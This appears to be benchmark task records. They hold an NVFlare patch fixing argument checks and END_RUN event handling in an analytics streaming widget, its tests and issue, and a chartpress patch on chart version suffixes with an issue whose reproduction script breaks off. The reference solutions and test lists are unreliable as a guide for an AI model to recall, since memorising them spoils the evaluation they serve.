+ data_type = dxo.get_meta_prop(_DATA_TYPE_KEY)
+ kwargs = dxo.get_meta_prop(_KWARGS_KEY)
return cls(tag, value, data_type, kwargs)
diff --git a/nvflare/app_common/widgets/streaming.py b/nvflare/app_common/widgets/streaming.py
index 588f381e..dcd82aaa 100644
--- a/nvflare/app_common/widgets/streaming.py
+++ b/nvflare/app_common/widgets/streaming.py
@@ -45,11 +45,11 @@ def send_analytic_dxo(comp: FLComponent, dxo: DXO, fl_ctx: FLContext, event_type
event_type (str): Event type.
"""
if not isinstance(comp, FLComponent):
- raise TypeError("expect comp to be FLComponent, but got {}".format(type(fl_ctx)))
+ raise TypeError(f"expect comp to be an instance of FLComponent, but got {type(comp)}")
if not isinstance(dxo, DXO):
- raise TypeError("expect fl_ctx to be FLContext, but got {}".format(type(fl_ctx)))
+ raise TypeError(f"expect dxo to be an instance of DXO, but got {type(dxo)}")
if not isinstance(fl_ctx, FLContext):
- raise TypeError("expect fl_ctx to be FLContext, but got {}".format(type(fl_ctx)))
+ raise TypeError(f"expect fl_ctx to be an instance of FLContext, but got {type(fl_ctx)}")
fl_ctx.set_prop(key=FLContextKey.EVENT_DATA, value=dxo.to_shareable(), private=True, sticky=False)
comp.fire_event(event_type=event_type, fl_ctx=fl_ctx)
@@ -117,7 +117,7 @@ class AnalyticsSender(Widget):
"""Sends analytics data.
This class implements some common methods follows signatures from PyTorch SummaryWriter and Python logger.
- It provides a convenient way for LearnerService to use.
+ It provides a convenient way for Learner to use.
"""
super().__init__()
self.engine = None
@@ -126,50 +126,66 @@ class AnalyticsSender(Widget):
if event_type == EventType.START_RUN:
self.engine = fl_ctx.get_engine()
- def _add(self, tag: str, value, data_type: AnalyticsDataType, kwargs: Optional[dict] = None):
+ def _add(
+ self,
+ tag: str,
+ value,
+ data_type: AnalyticsDataType,
+ global_step: Optional[int] = None,
+ kwargs: Optional[dict] = None,
+ ):
+ kwargs = kwargs if kwargs else {}
+ if global_step:
+ if not isinstance(global_step, int):
+ raise TypeError(f"Expect global step to be an instance of int, but got {type(global_step)}")
+ kwargs["global_step"] = global_step
dxo = _write(tag=tag, value=value, data_type=data_type, kwargs=kwargs)
with self.engine.new_context() as fl_ctx:
send_analytic_dxo(self, dxo=dxo, fl_ctx=fl_ctx)
- def add_scalar(self, tag: str, scalar: float, **kwargs):
+ def add_scalar(self, tag: str, scalar: float, global_step: Optional[int] = None, **kwargs):
"""Sends a scalar.
Args:
tag (str): Data identifier.
scalar (float): Value to send.
+ global_step (optional, int): Global step value.
**kwargs: Additional arguments to pass to the receiver side.
"""
- self._add(tag=tag, value=scalar, data_type=AnalyticsDataType.SCALAR, kwargs=kwargs)
+ self._add(tag=tag, value=scalar, data_type=AnalyticsDataType.SCALAR, global_step=global_step, kwargs=kwargs)
- def add_scalars(self, tag: str, scalars: dict, **kwargs):
+ def add_scalars(self, tag: str, scalars: dict, global_step: Optional[int] = None, **kwargs):
"""Sends scalars.
Args:
tag (str): The parent name for the tags.
scalars (dict): Key-value pair storing the tag and corresponding values.
+ global_step (optional, int): Global step value.
**kwargs: Additional arguments to pass to the receiver side.
"""
- self._add(tag=tag, value=scalars, data_type=AnalyticsDataType.SCALARS, kwargs=kwargs)
+ self._add(tag=tag, value=scalars, data_type=AnalyticsDataType.SCALARS, global_step=global_step, kwargs=kwargs)
- def add_text(self, tag: str, text: str, **kwargs):
+ def add_text(self, tag: str, text: str, global_step: Optional[int] = None, **kwargs):
"""Sends a text.
Args:
tag (str): Data identifier.
text (str): String to send.
+ global_step (optional, int): Global step value.
**kwargs: Additional arguments to pass to the receiver side.
"""
- self._add(tag=tag, value=text, data_type=AnalyticsDataType.TEXT, kwargs=kwargs)
+ self._add(tag=tag, value=text, data_type=AnalyticsDataType.TEXT, global_step=global_step, kwargs=kwargs)
- def add_image(self, tag: str, image, **kwargs):
+ def add_image(self, tag: str, image, global_step: Optional[int] = None, **kwargs):
"""Sends an image.
Args:
tag (str): Data identifier.
image: Image to send.
+ global_step (optional, int): Global step value.
**kwargs: Additional arguments to pass to the receiver side.
"""
- self._add(tag=tag, value=image, data_type=AnalyticsDataType.IMAGE, kwargs=kwargs)
+ self._add(tag=tag, value=image, data_type=AnalyticsDataType.IMAGE, global_step=global_step, kwargs=kwargs)
def _log(self, tag: LogMessageTag, msg: str, event_type: str, *args, **kwargs):
"""Logs a message.
@@ -210,6 +226,18 @@ class AnalyticsSender(Widget):
"""Logs a message with tag LogMessageTag.CRITICAL."""
self._log(tag=LogMessageTag.CRITICAL, msg=msg, event_type=_LOG_CRITICAL_EVENT_TYPE, args=args, kwargs=kwargs)
+ def flush(self):
+ """Flushes out the message.
+
+ This is doing nothing, it is defined for mimic the PyTorch SummaryWriter behavior.
+ """
+ pass
+
+ def close(self):
+ """Close resources."""
+ if self.engine:
+ self.engine = None
+
class AnalyticsReceiver(Widget, ABC):
def __init__(self, events: Optional[List[str]] = None):
@@ -223,6 +251,7 @@ class AnalyticsReceiver(Widget, ABC):
events = [_ANALYTIC_EVENT_TYPE, f"fed.{_ANALYTIC_EVENT_TYPE}"]
self.events = events
self._save_lock = Lock()
+ self._end = False
@abstractmethod
def initialize(self, fl_ctx: FLContext):
@@ -250,32 +279,34 @@ class AnalyticsReceiver(Widget, ABC):
Args:
fl_ctx (FLContext): fl context.
-
"""
pass
def handle_event(self, event_type: str, fl_ctx: FLContext):
if event_type == EventType.START_RUN:
self.initialize(fl_ctx)
- elif event_type in self.events:
+ elif event_type in self.events and not self._end:
data = fl_ctx.get_prop(FLContextKey.EVENT_DATA, None)
if data is None:
- self.log_error(fl_ctx, "Missing event data.")
+ self.log_error(fl_ctx, "Missing event data.", fire_event=False)
return
if not isinstance(data, Shareable):
- self.log_error(fl_ctx, f"Expect shareable but get {type(data)}")
+ self.log_error(
+ fl_ctx, f"Expect data to be an instance of shareable but get {type(data)}", fire_event=False
+ )
return
- record_origin = fl_ctx.get_identity_name()
# if fed event use peer name to save
if fl_ctx.get_prop(FLContextKey.EVENT_SCOPE) == EventScope.FEDERATION:
- peer_name = data.get_peer_prop(ReservedKey.IDENTITY_NAME, None)
- record_origin = peer_name
+ record_origin = data.get_peer_prop(ReservedKey.IDENTITY_NAME, None)
+ else:
+ record_origin = fl_ctx.get_identity_name()
if record_origin is None:
- self.log_error(fl_ctx, "record_origin can't be None.")
+ self.log_error(fl_ctx, "record_origin can't be None.", fire_event=False)
return
with self._save_lock:
self.save(shareable=data, fl_ctx=fl_ctx, record_origin=record_origin)
elif event_type == EventType.END_RUN:
+ self._end = True
self.finalize(fl_ctx)
|
NVIDIA/NVFlare
|
94dfcbbd33db8746297d39c06cfa0955592fd255
|
diff --git a/test/test_analytix.py b/test/test_analytix.py
new file mode 100644
index 00000000..1b61d292
--- /dev/null
+++ b/test/test_analytix.py
@@ -0,0 +1,94 @@
+# Copyright (c) 2021, NVIDIA CORPORATION.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import pytest
+
+from nvflare.apis.analytix import _DATA_TYPE_KEY, _KWARGS_KEY, AnalyticsData, AnalyticsDataType
+from nvflare.apis.dxo import DXO, DataKind
+
+FROM_DXO_TEST_CASES = [
+ ("hello", 3.0, AnalyticsDataType.SCALAR),
+ ("world", "text", AnalyticsDataType.TEXT),
+ ("dict", {"key": 1.0}, AnalyticsDataType.SCALARS),
+]
+
+TO_DXO_TEST_CASES = [
+ AnalyticsData(tag="hello", value=3.0, data_type=AnalyticsDataType.SCALAR),
+ AnalyticsData(tag="world", value="text", data_type=AnalyticsDataType.TEXT),
+ AnalyticsData(tag="dict", value={"key": 1.0}, data_type=AnalyticsDataType.SCALARS),
+]
+
+FROM_DXO_INVALID_TEST_CASES = [
+ (dict(), TypeError, f"expect dxo to be an instance of DXO, but got {type(dict())}."),
+ (
+ DXO(data_kind=DataKind.WEIGHTS, data={"w": 1.0}),
+ TypeError,
+ f"expect data_type to be an instance of AnalyticsDataType, but got {type(None)}.",
+ ),
+]
+
+INVALID_TEST_CASES = [
+ (
+ dict(),
+ 1.0,
+ AnalyticsDataType.SCALAR,
+ None,
+ TypeError,
+ f"expect tag to be an instance of str, but got {type(dict())}.",
+ ),
+ (
+ "tag",
+ 1.0,
+ "scalar",
+ None,
+ TypeError,
+ f"expect data_type to be an instance of AnalyticsDataType, but got {type('')}.",
+ ),
+ (
+ "tag",
+ 1.0,
+ AnalyticsDataType.SCALAR,
+ [1],
+ TypeError,
+ f"expect kwargs to be an instance of dict, but got {type(list())}.",
+ ),
+]
+
+
+class TestAnalytix:
+ @pytest.mark.parametrize("tag,value,data_type,kwargs,expected_error,expected_msg", INVALID_TEST_CASES)
+ def test_invalid(self, tag, value, data_type, kwargs, expected_error, expected_msg):
+ with pytest.raises(expected_error, match=expected_msg):
+ _ = AnalyticsData(tag=tag, value=value, data_type=data_type, kwargs=kwargs)
+
+ @pytest.mark.parametrize("tag,value,data_type", FROM_DXO_TEST_CASES)
+ def test_from_dxo(self, tag, value, data_type):
+ dxo = DXO(data_kind=DataKind.ANALYTIC, data={tag: value})
+ dxo.set_meta_prop(_DATA_TYPE_KEY, data_type)
+ result = AnalyticsData.from_dxo(dxo)
+ assert result.tag == tag
+ assert result.value == value
+
+ @pytest.mark.parametrize("data", TO_DXO_TEST_CASES)
+ def test_to_dxo(self, data: AnalyticsData):
+ result = data.to_dxo()
+ assert result.data_kind == DataKind.ANALYTIC
+ assert result.data == {data.tag: data.value}
+ assert result.get_meta_prop(_DATA_TYPE_KEY) == data.data_type
+ assert result.get_meta_prop(_KWARGS_KEY) == data.kwargs
+
+ @pytest.mark.parametrize("dxo,expected_error,expected_msg", FROM_DXO_INVALID_TEST_CASES)
+ def test_from_dxo_invalid(self, dxo, expected_error, expected_msg):
+ with pytest.raises(expected_error, match=expected_msg):
+ _ = AnalyticsData.from_dxo(dxo)
diff --git a/test/test_streaming.py b/test/test_streaming.py
new file mode 100644
index 00000000..b1a105c1
--- /dev/null
+++ b/test/test_streaming.py
@@ -0,0 +1,54 @@
+# Copyright (c) 2021, NVIDIA CORPORATION.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import pytest
+
+from nvflare.apis.dxo import DXO, DataKind
+from nvflare.apis.fl_component import FLComponent
+from nvflare.apis.fl_context import FLContext
+from nvflare.app_common.widgets.streaming import send_analytic_dxo, write_scalar, write_scalars, write_text, write_image
+
+INVALID_TEST_CASES = [
+ (list(), dict(), FLContext(), TypeError, f"expect comp to be an instance of FLComponent, but got {type(list())}"),
+ (FLComponent(), dict(), FLContext(), TypeError, f"expect dxo to be an instance of DXO, but got {type(dict())}"),
+ (
+ FLComponent(),
+ DXO(data={"k": "v"}, data_kind=DataKind.ANALYTIC),
+ list(),
+ TypeError,
+ f"expect fl_ctx to be an instance of FLContext, but got {type(list())}",
+ ),
+]
+
+INVALID_WRITE_TEST_CASES = [
+ (write_scalar, list(), 1.0, TypeError, f"expect tag to be an instance of str, but got {type(list())}"),
+ (write_scalar, "tag", list(), TypeError, f"expect value to be an instance of float, but got {type(list())}"),
+ (write_scalars, list(), 1.0, TypeError, f"expect tag to be an instance of str, but got {type(list())}"),
+ (write_scalars, "tag", 1.0, TypeError, f"expect value to be an instance of dict, but got {type(1.0)}"),
+ (write_text, list(), 1.0, TypeError, f"expect tag to be an instance of str, but got {type(list())}"),
+ (write_text, "tag", 1.0, TypeError, f"expect value to be an instance of str, but got {type(1.0)}"),
+ (write_image, list(), 1.0, TypeError, f"expect tag to be an instance of str, but got {type(list())}"),
+]
+
+
+class TestStreaming:
+ @pytest.mark.parametrize("comp,dxo,fl_ctx,expected_error,expected_msg", INVALID_TEST_CASES)
+ def test_invalid_send_analytic_dxo(self, comp, dxo, fl_ctx, expected_error, expected_msg):
+ with pytest.raises(expected_error, match=expected_msg):
+ send_analytic_dxo(comp=comp, dxo=dxo, fl_ctx=fl_ctx)
+
+ @pytest.mark.parametrize("func,tag,value,expected_error,expected_msg", INVALID_WRITE_TEST_CASES)
+ def test_invalid_write_func(self, func, tag, value, expected_error, expected_msg):
+ with pytest.raises(expected_error, match=expected_msg):
+ func(tag, value)
|
Errors in streaming.py
@yanchengnv noticed some issues in nvflare/app_common/widgets/streaming.py:
- Lines 47 to 52: the argument checks and their error messages are wrong.
- All of the write_xxx() methods should check the tag and data arguments and make sure they are what we expect (str, dict, …).
- Line 257: in the call to self.log_xxx(), we should set send_event=False; otherwise it may cause recursive events.
- Since fed events are handled by a separate thread, there is a potential race condition where a fed event could be fired after the END_RUN event. In the Receiver code, we need to make sure to discard other events after END_RUN (and hence finalize) is done. A rough sketch of these suggestions follows this list.
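As a rough illustration only (not the project's actual code), here is a minimal, self-contained Python sketch of the two kinds of changes being asked for: explicit argument type checks whose messages name the right argument, and a receiver that discards events once END_RUN has been handled. All names in it (`write_scalar`, `Receiver`, `_end`, the event-type strings) are hypothetical stand-ins for the real NVFlare API.

```python
# Hypothetical sketch of the suggested fixes; names do not match the real NVFlare API.

def write_scalar(tag, value):
    # Check each argument and name it correctly in the error message.
    if not isinstance(tag, str):
        raise TypeError(f"expect tag to be an instance of str, but got {type(tag)}")
    if not isinstance(value, float):
        raise TypeError(f"expect value to be an instance of float, but got {type(value)}")
    return {tag: value}


class Receiver:
    def __init__(self):
        self._end = False  # set once END_RUN has been handled

    def handle_event(self, event_type, data):
        if event_type == "END_RUN":
            self._end = True  # finalize; anything arriving later is ignored
            return
        if self._end:
            return  # discard events racing in after END_RUN
        # ... save `data` here ...


# Usage: an analytics event arriving after END_RUN is silently dropped.
receiver = Receiver()
receiver.handle_event("END_RUN", None)
receiver.handle_event("analytics_event", write_scalar("loss", 0.1))
```

The recursion concern for self.log_xxx() is not shown here; it amounts to passing whatever flag the logger offers to suppress firing a new event from inside the event handler.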
|
0.0
|
94dfcbbd33db8746297d39c06cfa0955592fd255
|
[
"test/test_analytix.py::TestAnalytix::test_invalid[tag0-1.0-AnalyticsDataType.SCALAR-None-TypeError-expect",
"test/test_analytix.py::TestAnalytix::test_invalid[tag-1.0-scalar-None-TypeError-expect",
"test/test_analytix.py::TestAnalytix::test_invalid[tag-1.0-AnalyticsDataType.SCALAR-kwargs2-TypeError-expect",
"test/test_analytix.py::TestAnalytix::test_from_dxo[hello-3.0-AnalyticsDataType.SCALAR]",
"test/test_analytix.py::TestAnalytix::test_from_dxo[world-text-AnalyticsDataType.TEXT]",
"test/test_analytix.py::TestAnalytix::test_from_dxo[dict-value2-AnalyticsDataType.SCALARS]",
"test/test_analytix.py::TestAnalytix::test_to_dxo[data0]",
"test/test_analytix.py::TestAnalytix::test_to_dxo[data1]",
"test/test_analytix.py::TestAnalytix::test_to_dxo[data2]",
"test/test_analytix.py::TestAnalytix::test_from_dxo_invalid[dxo0-TypeError-expect",
"test/test_analytix.py::TestAnalytix::test_from_dxo_invalid[dxo1-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_send_analytic_dxo[comp0-dxo0-fl_ctx0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_send_analytic_dxo[comp1-dxo1-fl_ctx1-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_send_analytic_dxo[comp2-dxo2-fl_ctx2-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_scalar-tag0-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_scalar-tag-value1-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_scalars-tag2-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_scalars-tag-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_text-tag4-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_text-tag-1.0-TypeError-expect",
"test/test_streaming.py::TestStreaming::test_invalid_write_func[write_image-tag6-1.0-TypeError-expect"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-12-08 22:42:30+00:00
|
apache-2.0
| 389
|
|
jupyterhub__chartpress-64
|
diff --git a/.travis.yml b/.travis.yml
index a47cf03..998bf51 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -5,11 +5,12 @@ cache: pip
install:
- set -e
- pip install --upgrade pip
- - pip install pyflakes .
+ - pip install pyflakes pytest .
script:
- chartpress --version
- chartpress --help
- pyflakes .
+ - pytest -v ./tests
# This is a workaround to an issue caused by the existence of a docker
# registrymirror in our CI environment. Without this fix that removes the
diff --git a/README.md b/README.md
index 7dbf6a9..6caa976 100644
--- a/README.md
+++ b/README.md
@@ -157,3 +157,19 @@ in your `.travis.yml`:
git:
depth: false
```
+
+## Development
+
+Testing of this python package can be done using [`pyflakes`](https://github.com/PyCQA/pyflakes) and [`pytest`](https://github.com/pytest-dev/pytest). There is also some additional testing that is only run as part of TravisCI, as declared in [`.travis.yml`](.travis.yml).
+
+```
+# install chartpress locally
+pip install -e .
+
+# install dev dependencies
+pip install pyflakes pytest
+
+# run tests
+pyflakes .
+pytest -v
+```
diff --git a/chartpress.py b/chartpress.py
index df0fb19..1685946 100755
--- a/chartpress.py
+++ b/chartpress.py
@@ -10,6 +10,7 @@ from collections.abc import MutableMapping
from functools import lru_cache, partial
import os
import pipes
+import re
import shutil
import subprocess
from tempfile import TemporaryDirectory
@@ -55,29 +56,42 @@ def git_remote(git_repo):
return 'git@github.com:{0}'.format(git_repo)
-def last_modified_commit(*paths, **kwargs):
- """Get the last commit to modify the given paths"""
- return check_output([
- 'git',
- 'log',
- '-n', '1',
- '--pretty=format:%h',
- '--',
- *paths
- ], **kwargs).decode('utf-8').strip()
+def latest_tag_or_mod_commit(*paths, **kwargs):
+ """
+ Get the latest of a) the latest tagged commit, or b) the latest modification
+ commit to provided path.
+ """
+ latest_modification_commit = check_output(
+ [
+ 'git', 'log',
+ '--max-count=1',
+ '--pretty=format:%h',
+ '--',
+ *paths,
+ ],
+ **kwargs,
+ ).decode('utf-8').strip()
+ git_describe_head = check_output(
+ [
+ 'git', 'describe', '--tags', '--long'
+ ],
+ **kwargs,
+ ).decode('utf-8').strip().rsplit("-", maxsplit=2)
+ latest_tagged_commit = git_describe_head[2][1:]
-def last_modified_date(*paths, **kwargs):
- """Return the last modified date (as a string) for the given paths"""
- return check_output([
- 'git',
- 'log',
- '-n', '1',
- '--pretty=format:%cd',
- '--date=iso',
- '--',
- *paths
- ], **kwargs).decode('utf-8').strip()
+ try:
+ check_call(
+ [
+ 'git', 'merge-base', '--is-ancestor', latest_tagged_commit, latest_modification_commit,
+ ],
+ **kwargs,
+ )
+ except subprocess.CalledProcessError:
+ # latest_tagged_commit was newer than latest_modification_commit
+ return latest_tagged_commit
+ else:
+ return latest_modification_commit
def render_build_args(image_options, ns):
@@ -179,7 +193,55 @@ def image_needs_building(image):
return image_needs_pushing(image)
-def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_build=False, long=False):
+def _get_identifier(tag, n_commits, commit, long):
+ """
+ Returns a chartpress formatted chart version or image tag (identifier) with
+ a build suffix.
+
+ This function should provide valid Helm chart versions, which means they
+ need to be valid SemVer 2 version strings. It also needs to return valid
+ image tags, which means they need to not contain `+` signs either.
+
+ Example:
+ tag="0.1.2", n_commits="5", commit="asdf1234", long=True,
+ should return "0.1.2-005.asdf1234".
+ """
+ n_commits = int(n_commits)
+
+ if n_commits > 0 or long:
+ if "-" in tag:
+ # append a pre-release tag, with a . separator
+ # 0.1.2-alpha.1 -> 0.1.2-alpha.1.n.sha
+ return f"{tag}.{n_commits:03d}.{commit}"
+ else:
+ # append a release tag, with a - separator
+ # 0.1.2 -> 0.1.2-n.sha
+ return f"{tag}-{n_commits:03d}.{commit}"
+ else:
+ return f"{tag}"
+
+
+def _strip_identifiers_build_suffix(identifier):
+ """
+ Return a stripped chart version or image tag (identifier) without its build
+ suffix (.005.asdf1234), leaving it to represent a Semver 2 release or
+ pre-release.
+
+ Example:
+ identifier: "0.1.2-005.asdf1234" returns: "0.1.2"
+ identifier: "0.1.2-alpha.1.005.asdf1234" returns: "0.1.2-alpha.1"
+ """
+ # split away official SemVer 2 build specifications if used
+ if "+" in identifier:
+ return identifier.split("+", maxsplit=1)[0]
+
+ # split away our custom build specification: something ending in either
+ # . or - followed by three or more digits, a dot, an commit sha of four
+ # or more alphanumeric characters.
+ return re.sub(r'[-\.]\d{3,}\.\w{4,}\Z', "", identifier)
+
+
+def build_images(prefix, images, tag=None, push=False, chart_version=None, skip_build=False, long=False):
"""Build a collection of docker images
Args:
@@ -191,9 +253,9 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
to modify the image's files.
push (bool):
Whether to push the resulting images (default: False).
- chart_tag (str):
- The latest chart tag, included as a prefix on image tags
- if `tag` is not specified.
+ chart_version (str):
+ The latest chart version, trimmed from its build suffix, will be included
+ as a prefix on image tags if `tag` is not specified.
skip_build (bool):
Whether to skip the actual image build (only updates tags).
long (bool):
@@ -204,38 +266,35 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
Example 1:
- long=False: 0.9.0
- - long=True: 0.9.0_000.asdf1234
+ - long=True: 0.9.0-000.asdf1234
Example 2:
- - long=False: 0.9.0_004.sdfg2345
- - long=True: 0.9.0_004.sdfg2345
+ - long=False: 0.9.0-004.sdfg2345
+ - long=True: 0.9.0-004.sdfg2345
"""
value_modifications = {}
for name, options in images.items():
image_path = options.get('contextPath', os.path.join('images', name))
image_tag = tag
+ chart_version = _strip_identifiers_build_suffix(chart_version)
# include chartpress.yaml itself as it can contain build args and
# similar that influence the image that would be built
paths = list(options.get('paths', [])) + [image_path, 'chartpress.yaml']
- last_image_commit = last_modified_commit(*paths)
- if tag is None:
- n_commits = int(check_output(
+ image_commit = latest_tag_or_mod_commit(*paths, echo=False)
+ if image_tag is None:
+ n_commits = check_output(
[
'git', 'rev-list', '--count',
- # Note that the 0.0.1 chart_tag may not exist as it was a
+ # Note that the 0.0.1 chart_version may not exist as it was a
# workaround to handle git histories with no tags in the
- # current branch. Also, if the chart_tag is a later git
- # reference than the last_image_commit, this command will
- # return 0.
- f'{chart_tag + ".." if chart_tag != "0.0.1" else ""}{last_image_commit}',
+ # current branch. Also, if the chart_version is a later git
+ # reference than the image_commit, this
+ # command will return 0.
+ f'{"" if chart_version == "0.0.1" else chart_version + ".."}{image_commit}',
],
echo=False,
- ).decode('utf-8').strip())
-
- if n_commits > 0 or long:
- image_tag = f"{chart_tag}_{int(n_commits):03d}-{last_image_commit}"
- else:
- image_tag = f"{chart_tag}"
+ ).decode('utf-8').strip()
+ image_tag = _get_identifier(chart_version, n_commits, image_commit, long)
image_name = prefix + name
image_spec = '{}:{}'.format(image_name, image_tag)
@@ -251,7 +310,7 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
build_args = render_build_args(
options,
{
- 'LAST_COMMIT': last_image_commit,
+ 'LAST_COMMIT': image_commit,
'TAG': image_tag,
},
)
@@ -315,34 +374,43 @@ def build_chart(name, version=None, paths=None, long=False):
Example versions constructed:
- 0.9.0-alpha.1
- - 0.9.0-alpha.1+000.asdf1234 (--long)
- - 0.9.0-alpha.1+005.sdfg2345
- - 0.9.0-alpha.1+005.sdfg2345 (--long)
+ - 0.9.0-alpha.1.000.asdf1234 (--long)
+ - 0.9.0-alpha.1.005.sdfg2345
+ - 0.9.0-alpha.1.005.sdfg2345 (--long)
+ - 0.9.0
+ - 0.9.0-002.dfgh3456
"""
chart_file = os.path.join(name, 'Chart.yaml')
with open(chart_file) as f:
chart = yaml.load(f)
- last_chart_commit = last_modified_commit(*paths)
-
if version is None:
+ chart_commit = latest_tag_or_mod_commit(*paths, echo=False)
+
try:
- git_describe = check_output(['git', 'describe', '--tags', '--long', last_chart_commit]).decode('utf8').strip()
+ git_describe = check_output(
+ [
+ 'git', 'describe', '--tags', '--long', chart_commit
+ ],
+ echo=False,
+ ).decode('utf8').strip()
latest_tag_in_branch, n_commits, sha = git_describe.rsplit('-', maxsplit=2)
-
- n_commits = int(n_commits)
- if n_commits > 0 or long:
- version = f"{latest_tag_in_branch}+{n_commits:03d}.{sha}"
- else:
- version = f"{latest_tag_in_branch}"
+ # remove "g" prefix output by the git describe command
+ # ref: https://git-scm.com/docs/git-describe#_examples
+ sha = sha[1:]
+ version = _get_identifier(latest_tag_in_branch, n_commits, sha, long)
except subprocess.CalledProcessError:
# no tags on branch: fallback to the SemVer 2 compliant version
- # 0.0.1+<n_comits>.<last_chart_commit>
- n_commits = int(check_output(
- ['git', 'rev-list', '--count', last_chart_commit],
+ # 0.0.1-<n_commits>.<chart_commit>
+ latest_tag_in_branch = "0.0.1"
+ n_commits = check_output(
+ [
+ 'git', 'rev-list', '--count', chart_commit
+ ],
echo=False,
- ).decode('utf-8').strip())
- version = f"0.0.1+{n_commits:03d}.{last_chart_commit}"
+ ).decode('utf-8').strip()
+
+ version = _get_identifier(latest_tag_in_branch, n_commits, chart_commit, long)
chart['version'] = version
@@ -510,10 +578,7 @@ def main():
images=chart['images'],
tag=args.tag if not args.reset else chart.get('resetTag', 'set-by-chartpress'),
push=args.push,
- # chart_tag will act as a image tag prefix, we can get it from
- # the chart_version by stripping away the build part of the
- # SemVer 2 compliant chart_version.
- chart_tag=chart_version.split('+')[0],
+ chart_version=chart_version,
skip_build=args.skip_build or args.reset,
long=args.long,
)
|
jupyterhub/chartpress
|
84df258b335fe19d56d3fc849a9241d9c4eb7afe
|
diff --git a/tests/test_regexp.py b/tests/test_regexp.py
new file mode 100644
index 0000000..b597655
--- /dev/null
+++ b/tests/test_regexp.py
@@ -0,0 +1,14 @@
+from chartpress import _strip_identifiers_build_suffix
+from chartpress import _get_identifier
+
+def test__strip_identifiers_build_suffix():
+ assert _strip_identifiers_build_suffix(identifier="0.1.2-005.asdf1234") == "0.1.2"
+ assert _strip_identifiers_build_suffix(identifier="0.1.2-alpha.1.005.asdf1234") == "0.1.2-alpha.1"
+
+def test__get_identifier():
+ assert _get_identifier(tag="0.1.2", n_commits="0", commit="asdf123", long=True) == "0.1.2-000.asdf123"
+ assert _get_identifier(tag="0.1.2", n_commits="0", commit="asdf123", long=False) == "0.1.2"
+ assert _get_identifier(tag="0.1.2", n_commits="5", commit="asdf123", long=False) == "0.1.2-005.asdf123"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="0", commit="asdf1234", long=True) == "0.1.2-alpha.1.000.asdf1234"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="0", commit="asdf1234", long=False) == "0.1.2-alpha.1"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="5", commit="asdf1234", long=False) == "0.1.2-alpha.1.005.asdf1234"
|
Pre-release replaced by later builds
I've found a reproducible issue, present since #52, relating to the use of chartpress. Apparently, if we use chartpress to publish a tagged commit, like `0.9.0-alpha.1`, and later use chartpress to publish a later commit, the Helm chart repository's `index.yaml` gets its entry for `0.9.0-alpha.1` replaced by `0.9.0-alpha.1+001.g152b8c9a`, instead of having the new entry added alongside it...
https://github.com/jupyterhub/helm-chart/commit/29f7cbe19f5eba8cc76f2fefaa57d70ce2668495#diff-43a27642790006c93fea79f384f23b4fL2858-R2859
## Reproduction
You need chartpress and helm, where helm is initialized with `helm init --client-only`.
```
pip install chartpress==0.4.2
```
```
rm -rf /tmp/{z2jh,helm-chart,index}
mkdir /tmp/{z2jh,helm-chart,index}
pushd /tmp/helm-chart
git clone https://github.com/jupyterhub/helm-chart . --no-checkout
git checkout 6c4de08
popd
pushd /tmp/index
git init
helm repo index . --merge /tmp/helm-chart/index.yaml --url https://jupyterhub.github.io/helm-chart
git add index.yaml
git commit -m "index.yaml initial state: with 0.9.0-alpha.1"
rm --interactive=never /tmp/index/*
popd
pushd /tmp/z2jh
git clone https://github.com/jupyterhub/zero-to-jupyterhub-k8s . --no-checkout
git checkout 83af061d
chartpress --skip-build
helm package ./jupyterhub --destination /tmp/index
mv /tmp/index/jupyterhub-0.9.0-alpha.1+001.g152b8c9.tgz /tmp/index/jupyterhub-0.9.0-alpha.1_001.g152b8c9.tgz
popd
pushd /tmp/index
helm repo index . --merge /tmp/helm-chart/index.yaml --url https://jupyterhub.github.io/helm-chart
git add index.yaml
git commit -m "merge with 0.9.0-alpha.1+n.sha overrode 0.9.0-alpha.1 entry"
cp /tmp/index/* /tmp/helm-chart/
rm --interactive=never /tmp/index/*
#rm /tmp/index/index.yaml
popd
pushd /tmp/z2jh
git checkout 0.9.0-alpha.1
chartpress --skip-build
helm package ./jupyterhub --destination /tmp/index
popd
pushd /tmp/index
helm repo index . --merge /tmp/helm-chart/index.yaml --url https://jupyterhub.github.io/helm-chart
rm --interactive=never /tmp/index/jupyterhub-*
git add index.yaml
git commit -m "Should not do anything."
```
## Reproduction results
```diff
- apiVersion: v1
appVersion: 1.0.1dev
- created: "2019-10-17T22:17:04.353205591Z"
+ created: "2019-10-19T20:01:39.379225412+02:00"
description: Multi-user Jupyter installation
